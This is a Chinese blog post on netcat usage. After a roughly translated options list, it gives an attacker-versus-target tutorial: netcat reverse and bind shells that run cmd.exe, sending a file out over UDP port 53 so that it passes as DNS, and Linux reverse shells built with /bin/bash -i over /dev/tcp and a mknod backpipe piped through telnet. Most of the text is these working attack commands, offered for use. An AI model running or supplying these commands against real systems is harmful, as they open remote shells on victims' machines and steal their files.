netcat的用法

连接到某处:nc [-options] hostname port[s] [ports] ...

侦听入站:nc -l -p port [-options] [hostname] [port]

options:

-d 分离形式控制台后台模式

-c,--close从标准输入的EOF密切联系

  -e,--exec = PROGRAM程序后,exec的连接

  -g,--gateway = LIST源路由跳点[S],多达8个

  -G,--pointer = NUM源路由指针:4,8,12,...

  -h,--help显示帮助并退出

  对于线发送-i,--interval = SECS延迟间隔,端口扫描

  -l,--listen监听模式,用于入站连接

  -L,--tunnel =地址:端口转发本地端口远程地址

  -n,--dont,解决纯数字IP地址,不DNS

  -o,--output = FILE输出hexdump都通信,以文件(-x暗示)

  -p,--local端口= NUM本地端口号

  -r,--randomize随机本地和远程端口

  -s,--source =地址本地源地址(IP或主机名)

  -t,--tcp TCP模式(默认)

  -T,使用Telnet协商--telnet回答

  -u,--udp UDP模式

  -v,--verbose冗长(使用两次,更详细)

  -V,--version输出版本信息并退出

  -x,--hexdump hexdump都传入和传出流量

  -w,--wait = SECS超时连接和最后读网

  -z,--zero零I / O模式(用于扫描)

攻击机建立服务器等目标机送CMD

攻击机:kali

nc -l -p 3333

 

目标机:XP

nc -d 攻击机IP -e -cmd.exe

 

 

 

目标机建立服务器等攻击机去联

目标机:

nc -d -l -p 3333 -e cmd.exe

 

攻击机:

nc 目标机IP 3333

 

 

netcat传文件(先要攻击机建立服务端收取)UDP53号端口是DNS

目标机:nc -u 192.168.1.105 53 < 123.txt


这里192.168.1.105是攻击机的

 

攻击机:

nc -u -l -p 53 > 456.txt

 

以及

目标机器:nc -v -w 30 -p 3333 -l < 123.txt(-w是延迟,超过30秒断开,-l进入监听)

攻击机器:nc -v -w 3 192.168.1.108 3333 > 456.txt(192.168.1.108为目标机)


linux建立服务送shellwindows

攻击机:nc -l -n -vv -p 8080

                

目标机器:/bin/bash -i > /dev/tcp/192.168.1.108/8080 0<&1 2>&1

                     mknod backpipe p && telnet 192.168.1.108 8080 0<backpipe | /bin/bash 1>backpipe


本文出自 “网络安全爱好者” 博客,请务必保留此出处http://blackflag.blog.51cto.com/9679269/1641266

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。